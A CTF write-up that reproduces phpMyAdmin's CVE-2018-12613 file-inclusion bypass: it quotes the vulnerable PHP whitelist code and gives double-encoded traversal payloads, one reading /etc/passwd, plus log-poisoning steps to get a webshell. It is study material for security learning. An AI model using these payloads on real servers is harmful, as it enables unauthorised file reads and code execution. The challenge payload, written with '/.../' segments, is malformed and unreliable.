Reproducing CVE-2018-12613 through a CTF challenge

Keywords: PHP phpMyAdmin IE SQL

File inclusion

Kongji, I first came across this in the buuoj web check-in challenge.

Open the target and view the page source.


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

Key point
The HTML comment points at source.php; open it and you get this PHP source:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

Focus on this part again:


    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

Looking at it, there is a line of thought.

As long as this check passes, whatever is passed in the file parameter is included and executed, so any file can potentially be included.

When a file is included, the user controls the name of the included file. Because the incoming file name is not properly validated, or the validation is bypassed, an unintended file is operated on, which can lead to unintended file disclosure or even malicious code injection.

  • Look at the if condition again: the file parameter is not empty && it is a string && it passes the checkFile method. Now go into the checkFile method.
public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }

Look, hint.php is in the whitelist!

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

Visiting hint.php shows this hint:
flag not here, and flag in ffffllllaaaagggg

Looking back at the earlier condition: first, the value must be a string

(and the function must return true for the file to be accessed).

if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;

Then it checks whether the parameter is in the whitelist.

mb_strpos() finds the position of the first occurrence of one string inside another; here it is the position of '?' in the parameter (the '?' appended to $page guarantees a match, so a value without '?' is kept whole).

mb_substr() then truncates the string at that position.

The truncated value is compared with the whitelist again, and the same operation is repeated once more after a urldecode().

This is the same hole as phpMyAdmin CVE-2018-12613. PHP already URL-decodes the request once, so when we submit %253f (the urlencode of the urlencode of '?'), the value that reaches the check is hint.php%3f/...; the third stage urldecodes it again into hint.php?/..., truncates at the '?' and finds hint.php in the whitelist. The include, however, receives the still-encoded hint.php%3f/..., where hint.php%3f is treated as a directory name that the ../ segments then step out of. The transformation is:

? --> %3f --> %253f

payload: file=hint.php%253f/.../.../.../.../.../.../.../ffffllllaaaagggg
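As an added example (not the writeup's own code), here is a Python port of checkFile()'s three stages, showing which stage accepts a given value, what path the include would actually resolve, and a hardened check; the web root /var/www/html and the sample values are assumptions.

```python
import os
from urllib.parse import unquote_plus

# Constructed whitelist, copied from the challenge's checkFile().
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def server_decodes(raw_query_value: str) -> str:
    """The single URL-decode applied before the value reaches $_REQUEST:
    a double-encoded %253f arrives as %3f, not as '?'."""
    return unquote_plus(raw_query_value)


def check_file_stage(page: str) -> int:
    """Port of checkFile(): returns the stage (1-3) that accepted the value,
    or 0 if rejected. Stage n mirrors the n-th in_array() in the PHP."""
    allowed = WHITELIST.values()
    if page in allowed:                              # stage 1: exact match
        return 1
    # stage 2: mb_substr($page, 0, mb_strpos($page . '?', '?')) == cut at '?'
    if page.split("?", 1)[0] in allowed:
        return 2
    # stage 3: urldecode() first, then cut again; here %3f turns into '?'
    if unquote_plus(page).split("?", 1)[0] in allowed:
        return 3
    return 0


def escapes_base(page: str, base_dir: str = "/var/www/html") -> bool:
    """What include really opens: the raw value joined under the (assumed)
    web root. True when the resolved path leaves base_dir."""
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, page))
    return os.path.commonpath([base, full]) != base


def resolve_include(page: str, base_dir: str = "/var/www/html"):
    """Hardened check (assumed fix, not the project's): the exact validated
    string is the one resolved, with no decode or truncation, and the
    resolved path must stay inside base_dir. Returns the path or None."""
    if page not in WHITELIST.values() or escapes_base(page, base_dir):
        return None
    return os.path.realpath(os.path.join(os.path.realpath(base_dir), page))


if __name__ == "__main__":
    seen = server_decodes("hint.php%253f/../../secret")  # constructed input
    print(seen, "-> stage", check_file_stage(seen), "escapes:", escapes_base(seen))
```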

About CVE-2018-12613: phpMyAdmin file inclusion

On June 19, 2018, phpMyAdmin fixed a critical vulnerability in its latest release:

https://www.phpmyadmin.net/security/PMASA-2018-4/

The official advisory describes it as follows:

An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially 
execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded 
within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the 
"$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, 
and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login 
requirement and runs the vulnerable code without any authentication).

The problem is in index.php, lines 55-63:

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

Five checks are applied to the parameter here; if it passes them all, the file is loaded through include.

The last two are where the problem lies:

$target_blacklist = array (
    'import.php', 'export.php'
);

as well as
Core::checkPageValidity($_REQUEST['target']):

The code is at lines 443-476 of libraries/classes/Core.php:

    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

Look, this is almost identical to the challenge code above.

Now take a look at the whitelist it checks against:

public static $goto_whitelist = array(
      'db_datadict.php',
      'db_sql.php',
      'db_events.php',
      'db_export.php',
      'db_importdocsql.php',
      'db_multi_table_query.php',
      'db_structure.php',
      'db_import.php',
      'db_operations.php',
      'db_search.php',
      'db_routines.php',
      'export.php',
      'import.php',
      'index.php',
      'pdf_pages.php',
      'pdf_schema.php',
      'server_binlog.php',
      'server_collations.php',
      'server_databases.php',
      'server_engines.php',
      'server_export.php',
      'server_import.php',
      'server_privileges.php',
      'server_sql.php',
      'server_status.php',
      'server_status_advisor.php',
      'server_status_monitor.php',
      'server_status_queries.php',
      'server_status_variables.php',
      'server_variables.php',
      'sql.php',
      'tbl_addfield.php',
      'tbl_change.php',
      'tbl_create.php',
      'tbl_import.php',
      'tbl_indexes.php',
      'tbl_sql.php',
      'tbl_export.php',
      'tbl_operations.php',
      'tbl_structure.php',
      'tbl_relation.php',
      'tbl_replace.php',
      'tbl_row_action.php',
      'tbl_select.php',
      'tbl_zoom_select.php',
      'transformation_overview.php',
      'transformation_wrapper.php',
      'user_password.php',
  );

Evidently the phpMyAdmin developers anticipated parameters being appended after target: they cut off the part before the question mark by string splitting, matched it against the whitelist again, and then repeated the same step after a urldecode.

This gives the payload:

target=db_datadict.php%253f/../../../../../../../../etc/passwd

Now let's look more generally at the specific causes of file inclusion vulnerabilities.

  • Programmers usually put reused functions into a single file. When a function is needed, they call that file directly instead of writing the code again. This process of calling a file is generally known as file inclusion.
  • To make the code more flexible, they make the included file a variable so that it can be chosen dynamically.
  • Because of this flexibility, however, the client can cause a malicious file to be called, resulting in a File Inclusion Vulnerability.
  • Almost all scripting languages provide file inclusion, but File Inclusion vulnerabilities are mostly found in PHP web applications and very rarely, if ever, in JSP or ASP programs, which comes down to the language's own design (a guess).

Getshell

  • Upload an image and getshell
  • Read files, e.g. read PHP source
  • Include a log file to get a webshell:
  1. First find the log file location. You need permission to read the Apache configuration file or /etc/init.d/httpd. Default location: /var/log/httpd/access_log
  2. Get PHP code into the log file. Insert the PHP code when sending the URL request; usually capture the request with Burp Suite and modify it, or send it with curl. Insert it into the GET request or the User-Agent field.
  3. Include the log file (you must have permission to include it).

For example:

if (isset($_GET['page'])) {
    include $_GET['page'];   // user-controlled file name, no filtering
} else {
    include "hint.PHP";
}

Here $_GET['page'] lets the user control the variable. Without strict filtering, this leads to a vulnerability.

Code audit

Functions that include files:

  • include()
  • include_once()
  • require()
  • require_once()

Reference link: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613

Posted by NoMansLand on Thu, 16 Apr 2020 05:20:39 -0700